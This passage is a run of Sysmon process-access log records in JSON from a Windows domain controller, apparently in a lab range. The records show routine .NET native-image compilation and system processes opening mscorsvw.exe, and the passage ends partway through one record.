{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.965\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001072FD0B00}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.965","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001072FD0B00}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.965\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001072FD0B00}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.965","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001072FD0B00}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7682,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.981\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001072FD0B00}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.981","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001072FD0B00}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7683,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.059\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001016010C00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.059","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001016010C00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.059\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001016010C00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.059","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001016010C00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.075\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001016010C00}\r\nTargetProcessId: 4160\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.075","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001016010C00}","TargetProcessId":"4160","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.106\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001084040C00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.106","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001084040C00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.106\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001084040C00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 